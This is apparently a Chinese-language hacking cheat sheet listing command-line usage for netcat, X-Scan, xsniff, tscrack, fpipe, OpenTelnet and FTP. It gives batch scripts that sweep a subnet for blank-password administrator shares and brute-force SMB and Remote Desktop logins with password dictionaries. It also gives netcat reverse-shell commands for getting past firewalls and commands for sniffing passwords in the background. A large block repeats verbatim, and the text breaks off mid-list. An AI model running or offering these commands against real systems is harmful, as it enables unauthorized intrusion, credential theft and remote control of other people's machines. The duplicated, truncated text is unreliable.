history 查看自己下過的命令
ps 顯示進程狀態
kill 停止某進程
gcc 黑客通常用它來編譯C語言寫的文件
su 權限轉換爲指定使用者
telnet IP telnet連接對方主機(同win2K),當出現bash$時就說明連接成功。
ftp ftp連接上某服務器(同win2K)
附:批處理命令與變量
1:for命令及變量 基本格式:
FOR /參數 %variable IN (set) DO command [command_parameters] %variable:指定一個單一字母可替換的參數,如:%i ,而指定一個變量則用:%%i ,而調用變量時用:%i% ,變量是區分大小寫的(%i 不等於 %I)。
批處理每次能處理的變量從%0—%9共10個,其中%0默認給批處理文件名使用,%1默認爲使用此批處理時輸入的的第一個值,同理:%2—%9指輸入的第 2-9個值;例:net use ipipc$ pass /user:user 中ip爲%1,pass爲%2 ,user爲%3
(set):指定一個或一組文件,可使用通配符,如:(D:user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一個"1"指起始值,第二個"1"指增長量,第三個"254"指結束值,即:從1到254;“(1 -1 254)”說明:即從254到1 }
command:指定對第個文件執行的命令,如:net use命令;如要執行多個命令時,命令這間加:& 來隔開
command_parameters:爲特定命令指定參數或命令行開關
IN (set):指在(set)中取值;DO command :指執行command
參數:/L 指用增量形式{ (set)爲增量形式時 };/F 指從文件中不斷取值,直到取完爲止{ (set)爲文件時,如(d:pass.txt)時 }。
用法舉例:
@echo off
echo 用法格式:test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use /%1.%%G /user:administrator | find "命令成功完成" >>test.txt
存爲test.bat 說明:對指定的一個C類網段的254個IP依次試建立administrator密碼爲空的IPC$連接,如果成功就把該IP存在test.txt中。
/L指用增量形式(即從1-254或254-1);輸入的IP前面三位:*.*.*爲批處理默認的 %1;%%G 爲變量(ip的最後一位);& 用來隔開echo 和net use 這二個命令;| 指建立了ipc$後,在結果中用find查看是否有"命令成功完成"信息;%1.%%G 爲完整的IP地址;(1 1 254) 指起始值,增長量,結止值。
@echo off
echo 用法格式:ok.bat ip
FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200
存爲:ok.exe 說明:輸入一個IP後,用字典文件d:pass.dic來暴解d:user.dic中的用戶密碼,直到文件中值取完爲止。%%i爲用戶名;%1爲輸入的IP地址(默認)。
七:
2:if命令及變量 基本格式:
IF [not] errorlevel 數字 命令語句 如果程序運行最後返回一個等於或大於指定數字的退出編碼,指定條件爲“真”。
例:IF errorlevel 0 命令 指程序執行後返回的值爲0時,就值行後面的命令;IF not errorlevel 1 命令指程序執行最後返回的值不等於1,就執行後面的命令。
0 指發現併成功執行(真);1 指沒有發現、沒執行(假)。
IF [not] 字符串1==字符串2 命令語句 如果指定的文本字符串匹配(即:字符串1 等於 字符串2),就執行後面的命令。
例:“if "%2%"=="4" goto start”指:如果輸入的第二個變量爲4時,執行後面的命令(注意:調用變量時就%變量名%並加" ")
IF [not] exist 文件名 命令語句 如果指定的文件名存在,就執行後面的命令。
例:“if not nc.exe goto end”指:如果沒有發現nc.exe文件就跳到":end"標籤處。
IF [not] errorlevel 數字 命令語句 else 命令語句或 IF [not] 字符串1==字符串2 命令語句 else 命令語句或 IF [not] exist 文件名 命令語句 else 命令語句 加上:else 命令語句後指:當前面的條件不成立時,就指行else後面的命令。注意:else 必須與 if 在同一行纔有效。當有del命令時需把del命令全部內容用< >括起來,因爲del命令要單獨一行時才能執行,用上< >後就等於是單獨一行了;例如:“if exist test.txt. <del test.txt.> else echo test.txt.missing ”,注意命令中的“.”
(二)系統外部命令(均需下載相關工具):
1、瑞士軍刀:nc.exe
參數說明:
-h 查看幫助信息
-d 後臺模式
-e prog程序重定向,一但連接就執行[危險]
-i secs延時的間隔
-l 監聽模式,用於入站連接
-L 監聽模式,連接天閉後仍然繼續監聽,直到CTR+C
-n IP地址,不能用域名
-o film記錄16進制的傳輸
-p[空格]端口 本地端口號
-r 隨機本地及遠程端口
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出,用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入,輸出關掉(用於掃錨時)
基本用法:
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80端口
nc -l -p 80 開啓本機的TCP 80端口並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024端口
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在remote的TCP 5354端口
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的cmdshell並反向連接192.168.0.2的5354端口
高級用法:
nc -L -p 80 作爲蜜罐用1:開啓並不停地監聽80端口,直到CTR+C爲止
nc -L -p 80 > c:log.txt 作爲蜜罐用2:開啓並不停地監聽80端口,直到CTR+C,同時把結果輸出到c:log.txt
nc -L -p 80 < c:honeyport.txt 作爲蜜罐用3-1:開啓並不停地監聽80端口,直到CTR+C,並把c:honeyport.txt中內容送入管道中,亦可起到傳送文件作用
type.exe c:honeyport | nc -L -p 80 作爲蜜罐用3-2:開啓並不停地監聽80端口,直到CTR+C,並把c:honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用:nc -l -p 本機端口
在對方主機上用:nc -e cmd.exe 本機IP -p 本機端口 *win2K
nc -e /bin/sh 本機IP -p 本機端口 *linux,unix 反向連接突破對方主機的防火牆
本機上用:nc -d -l -p 本機端口 < 要傳送的文件路徑及名稱
在對方主機上用:nc -vv 本機IP 本機端口 > 存放文件的路徑及名稱 傳送文件到對方主機
備 注:
| 管道命令
< 或 > 重定向命令。“<”,例如:tlntadmn < test.txt 指把test.txt的內容賦值給tlntadmn命令
@ 表示執行@後面的命令,但不會顯示出來(後臺執行);例:@dir c:winnt >> d:log.txt 意思是:後臺執行dir,並把結果存在d:log.txt中
>與>>的區別 ">"指:覆蓋;">>"指:保存到(添加到)。
如:@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二個命令分別執行二次比較看:用>>的則是把二次的結果都保存了,而用:>則只有一次的結果,是因爲第二次的結果把第一次的覆蓋了。
八:
2、掃錨工具:xscan.exe
基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型(通過NETBIOS和SNMP協議)
-port 檢測常用服務的端口狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫權限
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 加載Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號 設置網絡適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網絡適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放端口的主機
-t 併發線程數量,併發主機數量 指定最大併發線程數量和併發主機數量, 默認數量爲100,10
-log 文件名 指定掃描報告文件名 (後綴爲:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測192.168.1.1-192.168.255.255網段內主機的所有漏洞,跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測192.168.1.1-192.168.255.255網段內主機的標準端口狀態,NT弱口令用戶,最大併發線程數量爲150,跳過沒有檢測到開放端口的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測“hostlist.txt”文件中列出的所有主機的標準端口狀態,CGI漏洞,最大併發線程數量爲200,同一時刻最多檢測5臺主機,顯示詳細檢測進度,跳過沒有檢測到開放端口的主機
九:
3、命令行方式嗅探器: xsniff.exe
可捕獲局域網內FTP/SMTP/POP3/HTTP協議密碼
參數說明
-tcp 輸出TCP數據報
-udp 輸出UDP數據報
-icmp 輸出ICMP數據報
-pass 過濾密碼信息
-hide 後臺運行
-host 解析主機名
-addr IP地址 過濾IP地址
-port 端口 過濾端口
-log 文件名 將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進制形式輸出
用法示例
xsniff.exe -pass -hide -log pass.log 後臺運行嗅探密碼並將密碼信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1並過濾tcp和udp信息並以ASCII格式輸出
4、終端服務密碼破解: tscrack.exe
參數說明
-h 顯示使用幫助
-v 顯示版本信息
-s 在屏幕上打出解密能力
-b 密碼錯誤時發出的聲音
-t 同是發出多個連接(多線程)
-N Prevent System Log entries on targeted server
-U 卸載移除tscrack組件
-f 使用-f後面的密碼
-F 間隔時間(頻率)
-l 使用-l後面的用戶名
-w 使用-w後面的密碼字典
-p 使用-p後面的密碼
-D 登錄主頁面
用法示例
tscrack 192.168.0.1 -l administrator -w pass.dic 遠程用密碼字典文件暴破主機的administrator的登陸密碼
tscrack 192.168.0.1 -l administrator -p 123456 用密碼123456遠程登陸192.168.0.1的administrator用戶
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
(①存爲3389.bat) (假設現有用SuperScan或其它掃錨器掃到一批開有3389的主機IP列表文件3389.txt)
3389.bat意思是:從3389.txt文件中取一個IP,接着運行hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(②存爲hack.bat) (運行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic與tscrack.exe在同一個目錄下;就可以等待結果了)
hack.bat意思是:運行tscrack.exe用字典暴破3389.txt中所有主機的administrator密碼,並將破解結果保存在rouji.txt文件中。
5、其它:
Shutdown.exe
Shutdown IP地址 t:20 20秒後將對方NT自動關閉(Windows 2003系統自帶工具,在Windows2000下用進就得下載此工具才能用。在前面Windows 2003 DOS命令中有詳細介紹。)
fpipe.exe (TCP端口重定向工具) 在第二篇中有詳細說明(端口重定向繞過防火牆)
fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 當有人掃錨你的80端口時,他掃到的結果會完全是www.sina.com.cn的主機信息
Fpipe -l 23 -s 88 -r 23 目標IP 把本機向目標IP發送的23端口Telnet請求經端口重定向後,就通過88端口發送到目標IP的23端口。(與目標IP建立Telnet時本機就用的 88端口與其相連接)然後:直接Telnet 127.0.0.1(本機IP)就連接到目標IP的23端口了。
OpenTelnet.exe (遠程開啓telnet工具)
opentelnet.exe IP 帳號 密碼 ntlm認證方式 Telnet端口 (不需要上傳ntlm.exe破壞微軟的身份驗證方式)直接遠程開啓對方的telnet服務後,就可用telnet ip 連接上對方。
NTLM認證方式:0:不使用NTLM身份驗證;1:先嚐試NTLM身份驗證,如果失敗,再使用用戶名和密碼;2:只使用NTLM身份驗證。
ResumeTelnet.exe (OpenTelnet附帶的另一個工具)
resumetelnet.exe IP 帳號 密碼 用Telnet連接完對方後,就用這個命令將對方的Telnet設置還原,並同時關閉Telnet服務。
十:
6、FTP命令詳解:
FTP命令是Internet用戶使用最頻繁的命令之一,熟悉並靈活應用FTP的內部命令,可以大大方便使用者,並收到事半功倍之效。如果你想學習使用進行後臺FTP下載,那麼就必須學習FTP指令。
FTP的命令行格式爲:
ftp -v -d -i -n -g [主機名] ,其中
-v 顯示遠程服務器的所有響應信息
-n 限制ftp的自動登錄,即不使用;.n etrc文件;
-d 使用調試方式;
-g 取消全局文件名。
FTP使用的內部命令如下(中括號表示可選項):
1.![cmd[args]]:在本地機中執行交互shell,exit回到ftp環境,如:!ls*.zip
2.$ macro-ame[args]: 執行宏定義macro-name。
3.account[password]: 提供登錄遠程系統成功後訪問系統資源所需的補充口令。
4.append local-file[remote-file]:將本地文件追加到遠程系統主機,若未指定遠程系統文件名,則使用本地文件名。
5.ascii:使用ascii類型傳輸方式。
6.bell:每個命令執行完畢後計算機響鈴一次。
7.bin:使用二進制文件傳輸方式。
8.bye:退出ftp會話過程。
9.case:在使用mget時,將遠程主機文件名中的大寫轉爲小寫字母。
10.cd remote-dir:進入遠程主機目錄。
11.cdup:進入遠程主機目錄的父目錄。
12.chmod mode file-name:將遠程主機文件file-name的存取方式設置爲mode,如:chmod 777 a.out。
13.close:中斷與遠程服務器的ftp會話(與open對應)。
14.cr:使用asscii方式傳輸文件時,將回車換行轉換爲回行。
15.delete remote-file:刪除遠程主機文件。
16.debug[debug-value]:設置調試方式, 顯示發送至遠程主機的每條命令,如:deb up 3,若設爲0,表示取消debug。
17.dir[remote-dir][local-file]:顯示遠程主機目錄,並將結果存入本地文件。
18.disconnection:同close。
19.form format:將文件傳輸方式設置爲format,缺省爲file方式。
20.get remote-file[local-file]: 將遠程主機的文件remote-file傳至本地硬盤的local-file。
21.glob:設置mdelete,mget,mput的文件名擴展,缺省時不擴展文件名,同命令行的-g參數。
22.hash:每傳輸1024字節,顯示一個hash符號(#)。
23.help[cmd]:顯示ftp內部命令cmd的幫助信息,如:help get。
24.idle[seconds]:將遠程服務器的休眠計時器設爲[seconds]秒。
25.image:設置二進制傳輸方式(同binary)。
26.lcd[dir]:將本地工作目錄切換至dir。
27.ls[remote-dir][local-file]:顯示遠程目錄remote-dir, 並存入本地文件local-file。
28.macdef macro-name:定義一個宏,遇到macdef下的空行時,宏定義結束。
29.mdelete[remote-file]:刪除遠程主機文件。
30.mdir remote-files local-file:與dir類似,但可指定多個遠程文件,如 :mdir *.o.*.zipoutfile 。
31.mget remote-files:傳輸多個遠程文件。
32.mkdir dir-name:在遠程主機中建一目錄。
33.mls remote-file local-file:同nlist,但可指定多個文件名。
34.mode[modename]:將文件傳輸方式設置爲modename, 缺省爲stream方式。
35.modtime file-name:顯示遠程主機文件的最後修改時間。
36.mput local-file:將多個文件傳輸至遠程主機。
37.newer file-name: 如果遠程機中file-name的修改時間比本地硬盤同名文件的時間更近,則重傳該文件。
38.nlist[remote-dir][local-file]:顯示遠程主機目錄的文件清單,並存入本地硬盤的local-file。
39.nmap[inpattern outpattern]:設置文件名映射機制, 使得文件傳輸時,文件中的某些字符相互轉換, 如:nmap $1.$2.$3[$1,$2].[$2,$3],則傳輸文件a1.a2.a3時,文件名變爲a1,a2。該命令特別適用於遠程主機爲非UNIX機的情況。
40.ntrans[inchars[outchars]]:設置文件名字符的翻譯機制,如ntrans1R,則文件名LLL將變爲RRR。
41.open host[port]:建立指定ftp服務器連接,可指定連接端口。
42.passive:進入被動傳輸方式。
43.prompt:設置多個文件傳輸時的交互提示。
44.proxy ftp-cmd:在次要控制連接中,執行一條ftp命令, 該命令允許連接兩個ftp服務器,以在兩個服務器間傳輸文件。第一條ftp命令必須爲open,以首先建立兩個服務器間的連接。
45.put local-file[remote-file]:將本地文件local-file傳送至遠程主機。
46.pwd:顯示遠程主機的當前工作目錄。
47.quit:同bye,退出ftp會話。
48.quote arg1,arg2...:將參數逐字發至遠程ftp服務器,如:quote syst.
49.recv remote-file[local-file]:同get。
50.reget remote-file[local-file]:類似於get, 但若local-file存在,則從上次傳輸中斷處續傳。
51.rhelp[cmd-name]:請求獲得遠程主機的幫助。
52.rstatus[file-name]:若未指定文件名,則顯示遠程主機的狀態, 否則顯示文件狀態。
53.rename[from][to]:更改遠程主機文件名。
54.reset:清除回答隊列。
55.restart marker:從指定的標誌marker處,重新開始get或put,如:restart 130。
56.rmdir dir-name:刪除遠程主機目錄。
57.runique:設置文件名只一性存儲,若文件存在,則在原文件後加後綴.1, .2等。
58.send local-file[remote-file]:同put。
59.sendport:設置PORT命令的使用。
60.site arg1,arg2...:將參數作爲SITE命令逐字發送至遠程ftp主機。
61.size file-name:顯示遠程主機文件大小,如:site idle 7200。
62.status:顯示當前ftp狀態。
63.struct[struct-name]:將文件傳輸結構設置爲struct-name, 缺省時使用stream結構。
64.sunique:將遠程主機文件名存儲設置爲只一(與runique對應)。
65.system:顯示遠程主機的操作系統類型。
66.tenex:將文件傳輸類型設置爲TENEX機的所需的類型。
67.tick:設置傳輸時的字節計數器。
68.trace:設置包跟蹤。
69.type[type-name]:設置文件傳輸類型爲type-name,缺省爲ascii,如:type binary,設置二進制傳輸方式。
70.umask[newmask]:將遠程服務器的缺省umask設置爲newmask,如:umask 3
71.user user-name[password][account]:向遠程主機表明自己的身份,需要口令時,必須輸入口令,如:user anonymous my@email。
72.verbose:同命令行的-v參數,即設置詳盡報告方式,ftp 服務器的所有響 應都將顯示給用戶,缺省爲on.
73.?[cmd]:同help.
#11 十一:
7:計算機運行命令全集 winver---------檢查Windows版本
wmimgmt.msc----打開windows管理體系結構
wupdmgr--------windows更新程序
winver---------檢查Windows版本
wmimgmt.msc----打開windows管理體系結構
wupdmgr--------windows更新程序
wscript--------windows腳本宿主設置
write----------寫字板winmsd-----系統信息
wiaacmgr-------掃描儀和照相機嚮導
winchat--------XP自帶局域網聊天
mem.exe--------顯示內存使用情況
Msconfig.exe---系統配置實用程序
mplayer2-------簡易widnows media player
mspaint--------畫圖板
mstsc----------遠程桌面連接
mplayer2-------媒體播放機
magnify--------放大鏡實用程序
mmc------------打開控制檯
mobsync--------同步命令
dxdiag---------檢查DirectX信息
drwtsn32------ 系統醫生
devmgmt.msc--- 設備管理器
dfrg.msc-------磁盤碎片整理程序
diskmgmt.msc---磁盤管理實用程序
dcomcnfg-------打開系統組件服務
ddeshare-------打開DDE共享設置
dvdplay--------DVD播放器
net stop messenger-----停止信使服務
net start messenger----開始信使服務
notepad--------打開記事本
nslookup-------網絡管理的工具嚮導
ntbackup-------系統備份和還原
narrator-------屏幕"講述人"
ntmsmgr.msc----移動存儲管理器
ntmsoprq.msc---移動存儲管理員操作請求
netstat -an----(TC)命令檢查接口
syncapp--------創建一個公文包
sysedit--------系統配置編輯器
sigverif-------文件簽名驗證程序
sndrec32-------錄音機
shrpubw--------創建共享文件夾
secpol.msc-----本地安全策略
syskey---------系統加密,一旦加密就不能解開,保護windows xp系統的雙重密碼
services.msc---本地服務設置
Sndvol32-------音
ps 顯示進程狀態
kill 停止某進程
gcc 黑客通常用它來編譯C語言寫的文件
su 權限轉換爲指定使用者
telnet IP telnet連接對方主機(同win2K),當出現bash$時就說明連接成功。
ftp ftp連接上某服務器(同win2K)
附:批處理命令與變量
1:for命令及變量 基本格式:
FOR /參數 %variable IN (set) DO command [command_parameters] %variable:指定一個單一字母可替換的參數,如:%i ,而指定一個變量則用:%%i ,而調用變量時用:%i% ,變量是區分大小寫的(%i 不等於 %I)。
批處理每次能處理的變量從%0—%9共10個,其中%0默認給批處理文件名使用,%1默認爲使用此批處理時輸入的的第一個值,同理:%2—%9指輸入的第 2-9個值;例:net use ipipc$ pass /user:user 中ip爲%1,pass爲%2 ,user爲%3
(set):指定一個或一組文件,可使用通配符,如:(D:user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一個"1"指起始值,第二個"1"指增長量,第三個"254"指結束值,即:從1到254;“(1 -1 254)”說明:即從254到1 }
command:指定對第個文件執行的命令,如:net use命令;如要執行多個命令時,命令這間加:& 來隔開
command_parameters:爲特定命令指定參數或命令行開關
IN (set):指在(set)中取值;DO command :指執行command
參數:/L 指用增量形式{ (set)爲增量形式時 };/F 指從文件中不斷取值,直到取完爲止{ (set)爲文件時,如(d:pass.txt)時 }。
用法舉例:
@echo off
echo 用法格式:test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use /%1.%%G /user:administrator | find "命令成功完成" >>test.txt
存爲test.bat 說明:對指定的一個C類網段的254個IP依次試建立administrator密碼爲空的IPC$連接,如果成功就把該IP存在test.txt中。
/L指用增量形式(即從1-254或254-1);輸入的IP前面三位:*.*.*爲批處理默認的 %1;%%G 爲變量(ip的最後一位);& 用來隔開echo 和net use 這二個命令;| 指建立了ipc$後,在結果中用find查看是否有"命令成功完成"信息;%1.%%G 爲完整的IP地址;(1 1 254) 指起始值,增長量,結止值。
@echo off
echo 用法格式:ok.bat ip
FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200
存爲:ok.exe 說明:輸入一個IP後,用字典文件d:pass.dic來暴解d:user.dic中的用戶密碼,直到文件中值取完爲止。%%i爲用戶名;%1爲輸入的IP地址(默認)。
七:
2:if命令及變量 基本格式:
IF [not] errorlevel 數字 命令語句 如果程序運行最後返回一個等於或大於指定數字的退出編碼,指定條件爲“真”。
例:IF errorlevel 0 命令 指程序執行後返回的值爲0時,就值行後面的命令;IF not errorlevel 1 命令指程序執行最後返回的值不等於1,就執行後面的命令。
0 指發現併成功執行(真);1 指沒有發現、沒執行(假)。
IF [not] 字符串1==字符串2 命令語句 如果指定的文本字符串匹配(即:字符串1 等於 字符串2),就執行後面的命令。
例:“if "%2%"=="4" goto start”指:如果輸入的第二個變量爲4時,執行後面的命令(注意:調用變量時就%變量名%並加" ")
IF [not] exist 文件名 命令語句 如果指定的文件名存在,就執行後面的命令。
例:“if not nc.exe goto end”指:如果沒有發現nc.exe文件就跳到":end"標籤處。
IF [not] errorlevel 數字 命令語句 else 命令語句或 IF [not] 字符串1==字符串2 命令語句 else 命令語句或 IF [not] exist 文件名 命令語句 else 命令語句 加上:else 命令語句後指:當前面的條件不成立時,就指行else後面的命令。注意:else 必須與 if 在同一行纔有效。當有del命令時需把del命令全部內容用< >括起來,因爲del命令要單獨一行時才能執行,用上< >後就等於是單獨一行了;例如:“if exist test.txt. <del test.txt.> else echo test.txt.missing ”,注意命令中的“.”
(二)系統外部命令(均需下載相關工具):
1、瑞士軍刀:nc.exe
參數說明:
-h 查看幫助信息
-d 後臺模式
-e prog程序重定向,一但連接就執行[危險]
-i secs延時的間隔
-l 監聽模式,用於入站連接
-L 監聽模式,連接天閉後仍然繼續監聽,直到CTR+C
-n IP地址,不能用域名
-o film記錄16進制的傳輸
-p[空格]端口 本地端口號
-r 隨機本地及遠程端口
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出,用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入,輸出關掉(用於掃錨時)
基本用法:
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80端口
nc -l -p 80 開啓本機的TCP 80端口並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024端口
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在remote的TCP 5354端口
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的cmdshell並反向連接192.168.0.2的5354端口
高級用法:
nc -L -p 80 作爲蜜罐用1:開啓並不停地監聽80端口,直到CTR+C爲止
nc -L -p 80 > c:log.txt 作爲蜜罐用2:開啓並不停地監聽80端口,直到CTR+C,同時把結果輸出到c:log.txt
nc -L -p 80 < c:honeyport.txt 作爲蜜罐用3-1:開啓並不停地監聽80端口,直到CTR+C,並把c:honeyport.txt中內容送入管道中,亦可起到傳送文件作用
type.exe c:honeyport | nc -L -p 80 作爲蜜罐用3-2:開啓並不停地監聽80端口,直到CTR+C,並把c:honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用:nc -l -p 本機端口
在對方主機上用:nc -e cmd.exe 本機IP -p 本機端口 *win2K
nc -e /bin/sh 本機IP -p 本機端口 *linux,unix 反向連接突破對方主機的防火牆
本機上用:nc -d -l -p 本機端口 < 要傳送的文件路徑及名稱
在對方主機上用:nc -vv 本機IP 本機端口 > 存放文件的路徑及名稱 傳送文件到對方主機
備 注:
| 管道命令
< 或 > 重定向命令。“<”,例如:tlntadmn < test.txt 指把test.txt的內容賦值給tlntadmn命令
@ 表示執行@後面的命令,但不會顯示出來(後臺執行);例:@dir c:winnt >> d:log.txt 意思是:後臺執行dir,並把結果存在d:log.txt中
>與>>的區別 ">"指:覆蓋;">>"指:保存到(添加到)。
如:@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二個命令分別執行二次比較看:用>>的則是把二次的結果都保存了,而用:>則只有一次的結果,是因爲第二次的結果把第一次的覆蓋了。
八:
2、掃錨工具:xscan.exe
基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型(通過NETBIOS和SNMP協議)
-port 檢測常用服務的端口狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫權限
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 加載Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號 設置網絡適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網絡適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放端口的主機
-t 併發線程數量,併發主機數量 指定最大併發線程數量和併發主機數量, 默認數量爲100,10
-log 文件名 指定掃描報告文件名 (後綴爲:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測192.168.1.1-192.168.255.255網段內主機的所有漏洞,跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測192.168.1.1-192.168.255.255網段內主機的標準端口狀態,NT弱口令用戶,最大併發線程數量爲150,跳過沒有檢測到開放端口的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測“hostlist.txt”文件中列出的所有主機的標準端口狀態,CGI漏洞,最大併發線程數量爲200,同一時刻最多檢測5臺主機,顯示詳細檢測進度,跳過沒有檢測到開放端口的主機
九:
3、命令行方式嗅探器: xsniff.exe
可捕獲局域網內FTP/SMTP/POP3/HTTP協議密碼
參數說明
-tcp 輸出TCP數據報
-udp 輸出UDP數據報
-icmp 輸出ICMP數據報
-pass 過濾密碼信息
-hide 後臺運行
-host 解析主機名
-addr IP地址 過濾IP地址
-port 端口 過濾端口
-log 文件名 將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進制形式輸出
用法示例
xsniff.exe -pass -hide -log pass.log 後臺運行嗅探密碼並將密碼信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1並過濾tcp和udp信息並以ASCII格式輸出
4、終端服務密碼破解: tscrack.exe
參數說明
-h 顯示使用幫助
-v 顯示版本信息
-s 在屏幕上打出解密能力
-b 密碼錯誤時發出的聲音
-t 同是發出多個連接(多線程)
-N Prevent System Log entries on targeted server
-U 卸載移除tscrack組件
-f 使用-f後面的密碼
-F 間隔時間(頻率)
-l 使用-l後面的用戶名
-w 使用-w後面的密碼字典
-p 使用-p後面的密碼
-D 登錄主頁面
用法示例
tscrack 192.168.0.1 -l administrator -w pass.dic 遠程用密碼字典文件暴破主機的administrator的登陸密碼
tscrack 192.168.0.1 -l administrator -p 123456 用密碼123456遠程登陸192.168.0.1的administrator用戶
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
(①存爲3389.bat) (假設現有用SuperScan或其它掃錨器掃到一批開有3389的主機IP列表文件3389.txt)
3389.bat意思是:從3389.txt文件中取一個IP,接着運行hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(②存爲hack.bat) (運行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic與tscrack.exe在同一個目錄下;就可以等待結果了)
hack.bat意思是:運行tscrack.exe用字典暴破3389.txt中所有主機的administrator密碼,並將破解結果保存在rouji.txt文件中。
5、其它:
Shutdown.exe
Shutdown IP地址 t:20 20秒後將對方NT自動關閉(Windows 2003系統自帶工具,在Windows2000下用進就得下載此工具才能用。在前面Windows 2003 DOS命令中有詳細介紹。)
fpipe.exe (TCP端口重定向工具) 在第二篇中有詳細說明(端口重定向繞過防火牆)
fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 當有人掃錨你的80端口時,他掃到的結果會完全是www.sina.com.cn的主機信息
Fpipe -l 23 -s 88 -r 23 目標IP 把本機向目標IP發送的23端口Telnet請求經端口重定向後,就通過88端口發送到目標IP的23端口。(與目標IP建立Telnet時本機就用的 88端口與其相連接)然後:直接Telnet 127.0.0.1(本機IP)就連接到目標IP的23端口了。
OpenTelnet.exe (遠程開啓telnet工具)
opentelnet.exe IP 帳號 密碼 ntlm認證方式 Telnet端口 (不需要上傳ntlm.exe破壞微軟的身份驗證方式)直接遠程開啓對方的telnet服務後,就可用telnet ip 連接上對方。
NTLM認證方式:0:不使用NTLM身份驗證;1:先嚐試NTLM身份驗證,如果失敗,再使用用戶名和密碼;2:只使用NTLM身份驗證。
ResumeTelnet.exe (OpenTelnet附帶的另一個工具)
resumetelnet.exe IP 帳號 密碼 用Telnet連接完對方後,就用這個命令將對方的Telnet設置還原,並同時關閉Telnet服務。
十:
6、FTP命令詳解:
FTP命令是Internet用戶使用最頻繁的命令之一,熟悉並靈活應用FTP的內部命令,可以大大方便使用者,並收到事半功倍之效。如果你想學習使用進行後臺FTP下載,那麼就必須學習FTP指令。
FTP的命令行格式爲:
ftp -v -d -i -n -g [主機名] ,其中
-v 顯示遠程服務器的所有響應信息
-n 限制ftp的自動登錄,即不使用;.n etrc文件;
-d 使用調試方式;
-g 取消全局文件名。
FTP使用的內部命令如下(中括號表示可選項):
1.![cmd[args]]:在本地機中執行交互shell,exit回到ftp環境,如:!ls*.zip
2.$ macro-ame[args]: 執行宏定義macro-name。
